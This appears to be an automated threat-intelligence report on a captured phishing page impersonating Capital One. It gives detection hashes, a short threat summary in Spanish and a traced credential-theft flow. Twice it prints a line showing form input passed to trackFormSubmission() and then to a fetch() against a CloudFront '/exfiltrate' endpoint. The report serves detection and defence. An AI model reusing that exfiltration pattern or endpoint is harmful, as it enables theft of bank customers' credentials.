Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T165E31E72B5012D7F6787BE96E9267F01F2A18235F40B1794FBA5090A4FC2FF59226324 |
|
CONTENT
ssdeep
|
3072:/lFvGzGVoFuzasIEC6IX75RcOGc0dzkkLpMY9lKkNdjc58ktu4hwZ2cj+hd2jEZ1:/lFvGzGVoFuzasIEC6IX75RcOGc0dzkJ |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
cd56b34b2caa5325 |
|
VISUAL
aHash
|
fff8f8f0f0f8ffff |
|
VISUAL
dHash
|
2c50e02322d12a2b |
|
VISUAL
wHash
|
fff830101080dbdf |
|
VISUAL
colorHash
|
060010100c0 |
|
VISUAL
cropResistant
|
2c50e02322d12a2b,f1c77d5f7d477f7c,030d719f9f4e777f,010d619585614f7e,0109d52d65456561,e1071dc919599992 |
• Amenaza: Phishing
• Objetivo: Clientes de Capital One
• Método: Suplantación de identidad a través de alojamiento gratuito
• Exfil: Potencialmente formularios
• Indicadores: Alojamiento gratuito, logo de la marca, JavaScript ofuscado, formularios.
• Riesgo: ALTO
The attacker aims to steal user credentials by creating a fake Capital One website.
User fills <input name='username'> → trackFormSubmission() → fetch('https://d26hpdecvhwn5s.cloudfront.net/exfiltrate') → Data sent to external endpoint
User fills <input name='username'> → trackFormSubmission() → fetch('https://d26hpdecvhwn5s.cloudfront.net/exfiltrate') → Data sent to external endpoint
sp.jstrackFormSubmissiontrackLinkClicksendDataPages with identical visual appearance (based on perceptual hash)
Found 10 other scans for this domain